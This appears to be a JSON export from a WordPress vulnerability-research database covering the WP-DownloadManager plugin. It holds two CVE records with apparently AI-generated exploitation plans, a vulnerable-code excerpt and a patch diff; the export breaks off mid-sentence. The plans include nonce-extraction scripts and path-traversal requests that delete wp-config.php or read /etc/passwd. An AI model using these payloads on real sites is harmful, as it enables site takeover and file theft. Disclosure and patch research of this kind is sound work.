[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f3rClft7NqEKz_gqFENXPY7_q7CUPrxh6woqaXpbc0gA":3,"$fsNwh_L-jWAExpsGnl8e0unfmFWwRmsjIJ5IlNU7H850":885,"$fQye8yj5o9xVIulte6KJxQpkFKaCTbXAzlbz3-IKA_zI":889},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":25,"download_link":26,"security_score":27,"vuln_count":28,"unpatched_count":29,"last_vuln_date":30,"fetched_at":31,"discovery_status":32,"vulnerabilities":33,"developer":194,"crawl_stats":39,"alternatives":202,"analysis":302,"fingerprints":860},"wp-downloadmanager","WP-DownloadManager","1.69.1","Lester Chan","https:\u002F\u002Fprofiles.wordpress.org\u002Fgamerz\u002F","\u003Ch3>General Usage\u003C\u002Fh3>\n\u003Col>\n\u003Cli>You Need To Re-Generate The Permalink \u003Ccode>WP-Admin -> Settings -> Permalinks -> Save Changes\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>To embed a specific file to be downloaded into a post\u002Fpage, use \u003Ccode>[download id=\"2\"]\u003C\u002Fcode> where 2 is your file id.\u003C\u002Fli>\n\u003Cli>To embed multiple files to be downloaded into a post\u002Fpage, use \u003Ccode>[download id=\"1,2,3\"]\u003C\u002Fcode> where 1,2,3 are your file ids.\u003C\u002Fli>\n\u003Cli>To limit the number of embedded downloads shown for each post in a post stream, use the \u003Ccode>stream_limit\u003C\u002Fcode> option.\n\u003Col>\n\u003Cli>Example: \u003Ccode>[download id=\"2\" stream_limit=\"4\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>This will only display the first 4 downloads for the post when rendered in a post stream, and display the full list of downloads when viewing the single post.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003C\u002Fli>\n\u003Cli>To sort embedded downloads, use the \u003Ccode>sort_by\u003C\u002Fcode> and \u003Ccode>sort_order\u003C\u002Fcode> 
options.\n\u003Col>\n\u003Cli>Example: \u003Ccode>[download id=\"2\" sort_by=\"file_id\" sort_order=\"asc\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>This will sort the embedded downloads by file ID in ascending order.\u003C\u002Fli>\n\u003Cli>Valid values for \u003Ccode>sort_by\u003C\u002Fcode> are: \u003Ccode>file_id\u003C\u002Fcode>, \u003Ccode>file\u003C\u002Fcode>, \u003Ccode>file_name\u003C\u002Fcode>, \u003Ccode>file_size\u003C\u002Fcode>, \u003Ccode>file_date\u003C\u002Fcode>, and \u003Ccode>file_hits\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Fol>\n\u003C\u002Fli>\n\u003Cli>To choose what to display within the embedded file, use \u003Ccode>[download id=\"1\" display=\"both\"]\u003C\u002Fcode> where 1 is your file id and both will display both the file name and file description, whereas name will only display the filename. Note that this will overwrite the “Download Embedded File” template you have in your Download Templates.\u003C\u002Fli>\n\u003Cli>To embed files as well as categories, use \u003Ccode>[download id=\"1,2,3\" category=\"4,5,6\"]\u003C\u002Fcode> where 1,2,3 are your file id and 4,5,6 are your category ids.\u003C\u002Fli>\n\u003Cli>If you are using Default Permalinks, the file direct download link will be \u003Ccode>http:\u002F\u002Fyoursite.com\u002Findex.php?dl_id=2\u003C\u002Fcode>. If you are using Nice Permalinks, the file direct download link will be \u003Ccode>http:\u002F\u002Fyoursite.com\u002Fdownload\u002F2\u002F\u003C\u002Fcode>, where yoursite.com is your WordPress URL and 2 is your file id.\u003C\u002Fli>\n\u003Cli>The direct download category link will be \u003Ccode>http:\u002F\u002Fyoursite.com\u002Fdownloads\u002F?dl_cat=3\u003C\u002Fcode>, where yoursite.com is your WordPress URL, downloads is your Downloads Page name and 3 is your download category id.\u003C\u002Fli>\n\u003Cli>In order to upload the files straight to the downloads folder, the folder must be first CHMOD to 777. 
You can specify which folder to be the downloads folder in Download Options.\u003C\u002Fli>\n\u003Cli>You can configure the Download Options in \u003Ccode>WP-Admin -> Downloads -> Download Options\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>You can configure the Download Templates in \u003Ccode>WP-Admin -> Downloads -> Download Templates\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>Downloads Page\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Go to \u003Ccode>WP-Admin -> Pages -> Add New\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Type any title you like in the post’s title area\u003C\u002Fli>\n\u003Cli>If you \u003Ccode>ARE\u003C\u002Fcode> using nice permalinks, after typing the title, WordPress will generate the permalink to the page. You will see an ‘Edit’ link just beside the permalink.\u003C\u002Fli>\n\u003Cli>Click ‘Edit’ and type in \u003Ccode>downloads\u003C\u002Fcode> in the text field and click ‘Save’.\u003C\u002Fli>\n\u003Cli>Type \u003Ccode>[page_download]\u003C\u002Fcode> in the post’s content area.\u003C\u002Fli>\n\u003Cli>You can also use \u003Ccode>[page_download category=\"1\"]\u003C\u002Fcode>, this will display all downloads in Category ID 1.\u003C\u002Fli>\n\u003Cli>Click ‘Publish’\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>Download Stats (With Widgets)\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Go to \u003Ccode>WP-Admin -> Appearance -> Widgets\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>The widget name is \u003Ccode>Downloads\u003C\u002Fcode>.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>Development\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Flesterchan\u002Fwp-downloadmanager\" title=\"https:\u002F\u002Fgithub.com\u002Flesterchan\u002Fwp-downloadmanager\" rel=\"nofollow ugc\">https:\u002F\u002Fgithub.com\u002Flesterchan\u002Fwp-downloadmanager\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Translations\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Ca 
href=\"http:\u002F\u002Fdev.wp-plugins.org\u002Fbrowser\u002Fwp-downloadmanager\u002Fi18n\u002F\" title=\"http:\u002F\u002Fdev.wp-plugins.org\u002Fbrowser\u002Fwp-downloadmanager\u002Fi18n\u002F\" rel=\"nofollow ugc\">http:\u002F\u002Fdev.wp-plugins.org\u002Fbrowser\u002Fwp-downloadmanager\u002Fi18n\u002F\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Credits\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Plugin icon by \u003Ca href=\"http:\u002F\u002Fwww.freepik.com\" rel=\"nofollow ugc\">Freepik\u003C\u002Fa> from \u003Ca href=\"http:\u002F\u002Fwww.flaticon.com\" rel=\"nofollow ugc\">Flaticon\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Icons courtesy of \u003Ca href=\"http:\u002F\u002Fwww.famfamfam.com\u002F\" title=\"FamFamFam\" rel=\"nofollow ugc\">FamFamFam\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Download Icon by \u003Ca href=\"http:\u002F\u002Fwww.imvain.com\u002F\" title=\"Ryan Zimmerman\" rel=\"nofollow ugc\">Ryan Zimmerman\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Donations\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>I spent most of my free time creating, updating, maintaining and supporting these plugins, if you really love my plugins and could spare me a couple of bucks, I will really appreciate it. 
If not feel free to use it without any obligations.\u003C\u002Fli>\n\u003C\u002Ful>\n","Adds a simple download manager to your WordPress blog.",3000,309457,80,37,"2026-02-13T01:54:00.000Z","6.9.4","4.0","",[20,21,22,23,24],"download","downloads","file","files","manager","https:\u002F\u002Flesterchan.net\u002Fportfolio\u002Fprogramming\u002Fphp\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.69.1.zip",89,10,0,"2026-02-17 21:55:19","2026-04-16T10:56:18.058Z","no_bundle",[34,65,85,101,116,127,143,158,168,179],{"id":35,"url_slug":36,"title":37,"description":38,"plugin_slug":4,"theme_slug":39,"affected_versions":40,"patched_in_version":6,"severity":41,"cvss_score":42,"cvss_vector":43,"vuln_type":44,"published_date":30,"updated_date":45,"references":46,"days_to_patch":48,"patch_diff_files":49,"patch_trac_url":39,"research_status":54,"research_verified":55,"research_rounds_completed":56,"research_plan":57,"research_summary":58,"research_vulnerable_code":59,"research_fix_diff":60,"research_exploit_outline":61,"research_model_used":62,"research_started_at":63,"research_completed_at":64,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2026-2426","wp-downloadmanager-authenticated-administrator-path-traversal-to-arbitrary-file-deletion-via-file-parameter","WP-DownloadManager \u003C= 1.69 - Authenticated (Administrator+) Path Traversal to Arbitrary File Deletion via 'file' Parameter","The WP-DownloadManager plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.69 via the 'file' parameter in the file deletion functionality. This is due to insufficient validation of user-supplied file paths, allowing directory traversal sequences. 
This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can lead to remote code execution when critical files like wp-config.php are deleted.",null,"\u003C=1.69","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-02-18 10:20:51",[47],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa3f791dd-7c24-45e3-b4f6-b8d7e594c568?source=api-prod",1,[50,51,52,53],"download-manager.php","download-options.php","readme.txt","wp-downloadmanager.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-2426 - WP-DownloadManager Path Traversal\n\n## 1. Vulnerability Summary\nWP-DownloadManager (\u003C= 1.69) contains a path traversal vulnerability in its file deletion functionality within `download-manager.php`. The plugin fails to validate or sanitize the `file` parameter against directory traversal sequences (e.g., `..\u002F`). This allows an authenticated administrator to delete arbitrary files on the server by traversing out of the configured download directory. Deleting critical files like `wp-config.php` can lead to site takeover or remote code execution by re-triggering the WordPress installation process.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-manager.php`\n*   **Method:** `POST`\n*   **Authentication:** Required (Administrator or user with `manage_downloads` capability).\n*   **Vulnerable Parameter:** `file`\n*   **Action Parameter:** `do` (Set to the localized string for \"Delete File\")\n*   **Nonce Parameter:** `_wpnonce` (Action: `wp-downloadmanager_delete-file`)\n*   **Precondition:** At least one download must exist in the system to easily retrieve a valid nonce and `file_id` from the management UI.\n\n## 3. Code Flow\n1.  
**Entry Point:** The administrator accesses the \"Manage Downloads\" menu. `wp-downloadmanager.php` loads `download-manager.php`.\n2.  **Capability Check:** `download-manager.php` checks `current_user_can( 'manage_downloads' )`.\n3.  **Action Trigger:** The script checks `if(!empty($_POST['do']))`. If `$_POST['do']` matches the localized string for `Delete File` (e.g., `__('Delete File', 'wp-downloadmanager')`), it enters the deletion block.\n4.  **Nonce Verification:** It calls `check_admin_referer('wp-downloadmanager_delete-file')`.\n5.  **Path Resolution (The Sink):**\n    *   `$file_path = get_option( 'download_path' );` (Typically points to `wp-content\u002Fuploads\u002Fdownloads` or similar).\n    *   `$file_to_delete = $_POST['file'];` (User-controlled).\n    *   The plugin performs an `unlink($file_path . $file_to_delete)` or similar file operation without stripping `..\u002F` sequences.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is required for the deletion action. Since this is an administrator-level exploit, we will use the `browser_eval` tool to extract the nonce from the \"Manage Downloads\" page.\n\n1.  **Navigate:** Use `browser_navigate` to `wp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-manager.php`.\n2.  **Identify Nonce:** The deletion forms are typically located in the downloads table. Each row has a \"Delete\" button.\n3.  **Extraction JS:** \n    ```javascript\n    \u002F\u002F Find the hidden input with name '_wpnonce' inside a form that has 'Delete File' action\n    (function() {\n        const deleteBtn = Array.from(document.querySelectorAll('input[type=\"submit\"]')).find(el => el.value === 'Delete File');\n        if (deleteBtn && deleteBtn.form) {\n            return deleteBtn.form.querySelector('input[name=\"_wpnonce\"]').value;\n        }\n        return null;\n    })()\n    ```\n4.  **Note:** The `file_id` for a specific row can also be extracted from the same form (`input[name=\"file_id\"]`).\n\n## 5. 
Exploitation Strategy\n### Step 1: Authentication\nLog in as an Administrator using the provided credentials.\n\n### Step 2: Test Data Setup\nWe need a dummy file and a corresponding entry in the plugin to generate the management UI.\n1.  **Create Canary File:** `touch \u002Fvar\u002Fwww\u002Fhtml\u002Ftraversal-canary.php`\n2.  **Configure Download Path:** Ensure `download_path` is set to a known location via WP-CLI: `wp option update download_path \"\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\" --format=json`.\n3.  **Add Dummy Download:** \n    ```bash\n    wp db query \"INSERT INTO wp_downloads (file_name, file, file_size, file_date, file_updated_date, file_last_downloaded_date) VALUES ('Canary', 'canary.txt', 0, NOW(), NOW(), NOW());\"\n    ```\n\n### Step 3: Extract Nonce and ID\n1.  Navigate to `admin.php?page=wp-downloadmanager\u002Fdownload-manager.php`.\n2.  Use `browser_eval` with the script in Section 4 to get the `_wpnonce` and `file_id`.\n\n### Step 4: Execution\nSend a POST request to delete the canary file at the root.\n\n*   **URL:** `https:\u002F\u002Ftarget.local\u002Fwp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-manager.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    do=Delete File&\n    file=..\u002Ftraversal-canary.php&\n    file_id=[EXTRACTED_ID]&\n    _wpnonce=[EXTRACTED_NONCE]\n    ```\n    *(Note: The `do` value must match the exact button text, usually \"Delete File\" in English).*\n\n## 6. Expected Results\n*   **Response:** The server should respond with a 200 OK and a message indicating the file was deleted (e.g., \"File Deleted\").\n*   **Side Effect:** The file `\u002Fvar\u002Fwww\u002Fhtml\u002Ftraversal-canary.php` will be removed from the filesystem.\n\n## 7. Verification Steps\n1.  
**Check Filesystem:** Use WP-CLI to check if the canary file exists:\n    ```bash\n    ls \u002Fvar\u002Fwww\u002Fhtml\u002Ftraversal-canary.php\n    ```\n    (Expected: `ls: cannot access ... No such file or directory`)\n2.  **Check Database:** Verify the entry was also removed from the downloads table:\n    ```bash\n    wp db query \"SELECT * FROM wp_downloads WHERE file_name='Canary';\"\n    ```\n\n## 8. Alternative Approaches\nIf the \"Delete File\" action name is different due to translation:\n1.  Inspect the page source to find the value of the `input[type=\"submit\"]` button in the delete form.\n2.  Use that value in the `do` parameter.\n\nIf the individual delete fails, check for **Bulk Actions**:\n*   The `do` parameter might be `Delete` with an array of `file_ids[]`.\n*   Check if the bulk delete logic also uses the `file` parameter directly.\n*   The primary traversal is documented to be in the `file` parameter during the `Delete File` case.","The WP-DownloadManager plugin for WordPress is vulnerable to arbitrary file deletion via path traversal in versions up to and including 1.69. Authenticated administrators can exploit the 'file' parameter during the file deletion process by including directory traversal sequences (e.g., ..\u002F), allowing them to delete critical system files like wp-config.php. Deletion of configuration files can reset the site and potentially lead to remote code execution during the re-installation process.","\u002F* download-manager.php lines 208-215 *\u002F\ncase __('Delete File', 'wp-downloadmanager');\n\tcheck_admin_referer('wp-downloadmanager_delete-file');\n\t$file_id  = ! empty( $_POST['file_id'] ) ? intval( $_POST['file_id'] ) : 0;\n\t$file = ! empty( $_POST['file'] ) ? sanitize_text_field( $_POST['file'] ) : '';\n\t$file_name = ! empty( $_POST['file_name'] ) ? sanitize_text_field( $_POST['file_name'] ) : '';\n\t$unlinkfile = ! empty( $_POST['unlinkfile'] ) ? 
intval( $_POST['unlinkfile'] ) : 0;\n\tif($unlinkfile == 1) {\n\t\tif(!unlink($file_path.$file)) {","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69\u002Fdownload-manager.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69.1\u002Fdownload-manager.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69\u002Fdownload-manager.php\t2024-08-19 13:32:44.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69.1\u002Fdownload-manager.php\t2026-02-13 01:54:04.000000000 +0000\n@@ -208,21 +213,20 @@\n \t\tcase __('Delete File', 'wp-downloadmanager');\n \t\t\tcheck_admin_referer('wp-downloadmanager_delete-file');\n \t\t\t$file_id  = ! empty( $_POST['file_id'] ) ? intval( $_POST['file_id'] ) : 0;\n-\t\t\t$file = ! empty( $_POST['file'] ) ? sanitize_text_field( $_POST['file'] ) : '';\n-\t\t\t$file_name = ! empty( $_POST['file_name'] ) ? sanitize_text_field( $_POST['file_name'] ) : '';\n+\t\t\t$file = $wpdb->get_row( $wpdb->prepare( \"SELECT * FROM $wpdb->downloads WHERE file_id = %d\", $file_id ) );\n \t\t\t$unlinkfile = ! empty( $_POST['unlinkfile'] ) ? intval( $_POST['unlinkfile'] ) : 0;\n-\t\t\tif($unlinkfile == 1) {\n-\t\t\t\tif(!unlink($file_path.$file)) {\n-\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">'.sprintf(__('Error In Deleting File \\'%s (%s)\\' From Server', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\tif ( $unlinkfile === 1 ) {\n+\t\t\t\tif ( ! unlink( $file_path . $file->file ) ) {\n+\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">' . sprintf( __( 'Error In Deleting File \\'%s (%s)\\' From Server', 'wp-downloadmanager' ), $file->file_name, $file->file ) . 
'\u003C\u002Fp>';\n \t\t\t\t} else {\n-\t\t\t\t\t$text = '\u003Cp style=\"color: green;\">'.sprintf(__('File \\'%s (%s)\\' Deleted From Server Successfully', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t\t\t$text = '\u003Cp style=\"color: green;\">' . sprintf( __( 'File \\'%s (%s)\\' Deleted From Server Successfully', 'wp-downloadmanager' ), $file->file_name, $file->file ) . '\u003C\u002Fp>';\n \t\t\t\t}\n \t\t\t}\n-\t\t\t$deletefile = $wpdb->query(\"DELETE FROM $wpdb->downloads WHERE file_id = $file_id\");\n-\t\t\tif(!$deletefile) {\n-\t\t\t\t$text .= '\u003Cp style=\"color: red;\">'.sprintf(__('Error In Deleting File \\'%s (%s)\\'', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t$deletefile = $wpdb->query( $wpdb->prepare( \"DELETE FROM $wpdb->downloads WHERE file_id = %d\", $file->file_id ) );\n+\t\t\tif ( ! $deletefile ) {\n+\t\t\t\t$text .= '\u003Cp style=\"color: red;\">' . sprintf( __('Error In Deleting File \\'%s (%s)\\'', 'wp-downloadmanager'), $file->file_name, $file->file) . '\u003C\u002Fp>';\n \t\t\t} else {\n-\t\t\t\t$text .= '\u003Cp style=\"color: green;\">'.sprintf(__('File \\'%s (%s)\\' Deleted Successfully', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t\t$text .= '\u003Cp style=\"color: green;\">' . sprintf( __('File \\'%s (%s)\\' Deleted Successfully', 'wp-downloadmanager'), $file->file_name, $file->file) . 
'\u003C\u002Fp>';\n \t\t\t}\n \t\t\tbreak;\n \t}\n@@ -376,9 +380,7 @@\n \t\t\u003C?php if(!empty($text)) { echo '\u003C!-- Last Action -->\u003Cdiv id=\"message\" class=\"updated fade\">\u003Cp>'.stripslashes($text).'\u003C\u002Fp>\u003C\u002Fdiv>'; } ?>\n \t\t\u003C!-- Delete A File -->\n \t\t\u003Cform method=\"post\" action=\"\u003C?php echo admin_url('admin.php?page='.plugin_basename(__FILE__)); ?>\">\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file_id\" value=\"\u003C?php echo intval($file->file_id); ?>\" \u002F>\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file\" value=\"\u003C?php echo esc_attr( removeslashes( $file->file ) ); ?>\" \u002F>\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file_name\" value=\"\u003C?php echo esc_attr( removeslashes( $file->file_name ) ); ?>\" \u002F>\n+\t\t\t\u003Cinput type=\"hidden\" name=\"file_id\" value=\"\u003C?php echo esc_attr( intval( $file->file_id ) ); ?>\" \u002F>\n \t\t\t\u003C?php wp_nonce_field('wp-downloadmanager_delete-file'); ?>\n \t\t\t\u003Cdiv class=\"wrap\">\n \t\t\t\t\u003Ch2>\u003C?php _e('Delete A File', 'wp-downloadmanager'); ?>\u003C\u002Fh2>","To exploit this vulnerability, an attacker must have Administrator access or the 'manage_downloads' capability. \n\n1. Log in to the WordPress dashboard and navigate to the 'Manage Downloads' section of the WP-DownloadManager plugin.\n2. Create or identify an existing download record to retrieve its `file_id` and a valid `_wpnonce` for the `wp-downloadmanager_delete-file` action.\n3. Send a POST request to `\u002Fwp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-manager.php` with the following parameters:\n   - `do`: The localized string for 'Delete File'.\n   - `file_id`: The ID of the identified download record.\n   - `unlinkfile`: Set to 1 (to trigger the file system deletion).\n   - `_wpnonce`: The extracted nonce value.\n   - `file`: A path traversal string targeting the sensitive file (e.g., `..\u002F..\u002F..\u002Fwp-config.php`).\n4. 
The plugin will concatenate the download directory path with the user-controlled traversal string and call `unlink()`, deleting the target file.","gemini-3-flash-preview","2026-04-19 05:34:11","2026-04-19 05:34:32",{"id":66,"url_slug":67,"title":68,"description":69,"plugin_slug":4,"theme_slug":39,"affected_versions":40,"patched_in_version":6,"severity":70,"cvss_score":71,"cvss_vector":72,"vuln_type":44,"published_date":73,"updated_date":74,"references":75,"days_to_patch":48,"patch_diff_files":77,"patch_trac_url":39,"research_status":54,"research_verified":55,"research_rounds_completed":56,"research_plan":78,"research_summary":79,"research_vulnerable_code":80,"research_fix_diff":81,"research_exploit_outline":82,"research_model_used":62,"research_started_at":83,"research_completed_at":84,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2026-2419","wp-downloadmanager-authenticated-administrator-path-traversal-to-arbitrary-file-read-via-downloadpath-parameter","WP-DownloadManager \u003C= 1.69 - Authenticated (Administrator+) Path Traversal to Arbitrary File Read via 'download_path' Parameter","The WP-DownloadManager plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.69 via the 'download_path' configuration parameter. This is due to insufficient validation of the download path setting, which allows directory traversal sequences to bypass the WP_CONTENT_DIR prefix check. 
This makes it possible for authenticated attackers, with Administrator-level access and above, to configure the plugin to list and access arbitrary files on the server by exploiting the file browser functionality.","low",2.7,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","2026-02-17 19:12:08","2026-02-18 07:25:42",[76],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0bb96da1-9c17-4264-ac29-b5ff8dec745d?source=api-prod",[50,51,52,53],"# Exploitation Research Plan: CVE-2026-2419\n\n## 1. Vulnerability Summary\nThe **WP-DownloadManager** plugin (\u003C= 1.69) contains a path traversal vulnerability in its configuration settings. The plugin attempts to restrict the `download_path` (the directory where downloads are stored) to the `WP_CONTENT_DIR` directory. However, the validation logic in `download-options.php` only checks if the user-provided string *starts* with the content directory path. It fails to sanitize or check for directory traversal sequences (e.g., `..\u002F`) following the prefix. This allows an authenticated administrator to escape the intended directory and point the plugin to the server root (e.g., `\u002Fetc\u002F` or `\u002F`). Once the path is manipulated, the plugin's file listing and download features can be used to read arbitrary files from the server.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `wp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-options.php`\n- **Hook**: The options page is registered via `add_submenu_page` in `wp-downloadmanager.php` with the `manage_downloads` capability.\n- **Vulnerable Parameter**: `download_path`\n- **Authentication**: Required (Administrator or user with `manage_downloads` capability).\n- **Preconditions**: None, other than administrative access.\n- **CSRF Protection**: The plugin uses `wp_nonce_field('wp-downloadmanager_options')` and `check_admin_referer('wp-downloadmanager_options')`.\n\n## 3. Code Flow\n1. 
**Source (`download-options.php`)**:\n   - The script receives `$_POST['download_path']`.\n   - It performs a prefix check:\n     ```php\n     if ( substr( $download_path, 0, strlen( WP_CONTENT_DIR ) ) !== WP_CONTENT_DIR ) {\n         $download_path = WP_CONTENT_DIR;\n     }\n     ```\n   - If `WP_CONTENT_DIR` is `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content`, a payload like `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002F..\u002F..\u002F..\u002F..\u002F` satisfies the check.\n   - The value is saved via `update_option('download_path', $download_path)`.\n\n2. **Sink (`download-manager.php` and `download-add.php`)**:\n   - The plugin retrieves the path: `$file_path = get_option( 'download_path' );`.\n   - In the \"Add File\" or \"Edit File\" logic, it uses this path to check files:\n     ```php\n     $file_size = filesize($file_path.$file);\n     ```\n   - When a file is requested on the frontend (via `\u002F?dl_id=X`), the plugin reads the file from `$file_path . $filename` and streams it to the user.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability requires an authenticated Administrator. Nonces are required for both updating options and adding files.\n\n1. **Obtaining `download-options.php` Nonce**:\n   - Navigate to the Download Options page using `browser_navigate`.\n   - The nonce is generated by `wp_nonce_field('wp-downloadmanager_options')`.\n   - Use `browser_eval` to extract the value from the hidden input:\n     ```javascript\n     document.querySelector('input[name=\"_wpnonce\"]').value\n     ```\n\n2. **Obtaining `download-add.php` Nonce** (if needed to add a file):\n   - Navigate to the \"Add File\" page: `wp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-add.php`.\n   - Extract the nonce for `wp-downloadmanager_add-file` (inferred action name based on `download-manager.php` patterns).\n\n## 5. 
Exploitation Strategy\n\n### Step 1: Update Download Path to Server Root\n- **Request**: `POST \u002Fwp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-options.php`\n- **Body**:\n  - `_wpnonce`: `[EXTRACTED_NONCE]`\n  - `_wp_http_referer`: `\u002Fwp-admin\u002Fadmin.php?page=wp-downloadmanager%2Fdownload-options.php`\n  - `download_path`: `[WP_CONTENT_DIR]\u002F..\u002F..\u002F..\u002F..\u002F` (e.g., `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002F..\u002F..\u002F..\u002F..\u002F` to reach `\u002F`)\n  - `Submit`: `Save Changes`\n- **Validation**: Check if the response contains \"Download Path Updated\".\n\n### Step 2: Add a Sensitive File\n- **Request**: `POST \u002Fwp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-add.php` (Note: `download-add.php` handles adding new files).\n- **Body**:\n  - `_wpnonce`: `[EXTRACTED_ADD_NONCE]`\n  - `file_type`: `0` (Local file)\n  - `file`: `etc\u002Fpasswd` (Relative to our new root `\u002F`)\n  - `file_name`: `Traversed File`\n  - `do`: `Add File`\n- **Note**: The exact parameters for `download-add.php` can be verified by observing the form on that page.\n\n### Step 3: Trigger Arbitrary File Read\n- Identify the `dl_id` of the newly created file (usually returned in the URL or displayed in the Manage Downloads table).\n- **Request**: `GET \u002F?dl_id=[ID]`\n- **Response**: The content of `\u002Fetc\u002Fpasswd`.\n\n## 6. Test Data Setup\n1. **Identify `WP_CONTENT_DIR`**: Use `wp eval \"echo WP_CONTENT_DIR;\"` to determine the exact prefix required.\n2. **Administrator User**: Ensure a user exists with the `administrator` role.\n3. **Plugin Activation**: `wp plugin activate wp-downloadmanager`.\n\n## 7. 
Expected Results\n- After Step 1, the `download_path` option in the database should reflect the traversal string.\n- After Step 2, a new entry in the `wp_downloads` table should exist with the `file` column set to `etc\u002Fpasswd`.\n- After Step 3, the HTTP response body should contain the string `root:x:0:0:root`.\n\n## 8. Verification Steps\n1. **Verify Option Change**:\n   `wp option get download_path`\n2. **Verify File Entry**:\n   `wp db query \"SELECT * FROM wp_downloads WHERE file_name = 'Traversed File'\"`\n3. **Verify File Delivery**:\n   Check the response of the `GET \u002F?dl_id=[ID]` request for sensitive system data.\n\n## 9. Alternative Approaches\nIf \"Add File\" fails due to directory permissions or complexity:\n- **Direct Link Guessing**: If the traversal path is set to `\u002F`, and the plugin uses a predictable file naming\u002Fstoring convention, check if `download-manager.php`'s \"Edit File\" mode allows modifying an existing download's `file` parameter to `..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd` directly.\n- **Remote File filesize disclosure**: If the plugin refuses to add a file that \"doesn't exist,\" the `filesize()` call in `download-manager.php` can be used to verify the existence of files on the system by observing whether the file size is correctly calculated and displayed in the admin UI.","WP-DownloadManager versions up to 1.69 are vulnerable to Path Traversal because the 'download_path' configuration check only validates the prefix of the path, allowing directory traversal sequences to escape the intended directory. Authenticated administrators can exploit this to point the plugin to the server root and subsequently read arbitrary system files through the file download 